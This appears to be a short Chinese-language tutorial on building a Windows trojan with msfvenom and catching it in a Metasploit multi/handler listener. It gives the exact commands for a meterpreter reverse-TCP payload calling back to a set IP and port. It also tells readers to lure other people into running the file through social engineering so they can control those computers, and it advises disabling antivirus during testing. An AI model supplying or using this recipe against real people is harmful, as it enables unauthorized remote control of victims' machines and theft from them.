一、进入root模式
sudo -i
输入kali密码,密码不显示,输完回车即可
二、生成木马
命令格式为msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.30.133 LPORT=10000 -f exe -o 2.exe
其中windosw这里是系统类型,想生成什么系统的木马就写什么系统,例如linux、osx(苹果)、android(安卓),我这里以本机win10系统为例
三、开启msf
msfconsole
四、配置
1.使用模块
use exploit/multi/handler
2.查看配置
show options
3.更改配置
把这里的payload改为生成木马时的payload
set payload windows/x64/meterpreter_reverse_tcp
更改LHOST和LPORT
set LHOST
set LPORT
地址和端口为生成木马时所使用的
4.运行
run
出现上图则说明运行成功,现在木马已经准备就绪,可以通过社工等方式让别人上钩,从而控制电脑
5.举例
现在我以本机为例,首先要关闭杀毒软件或者把木马文件放到隔离区,然后把刚才生成好的木马2.exe运行后,本机没有异常,攻击机这边显示已经上钩
得到这个界面就说明已经获取了metepreter,可以通过help命令来查看可以进行的操作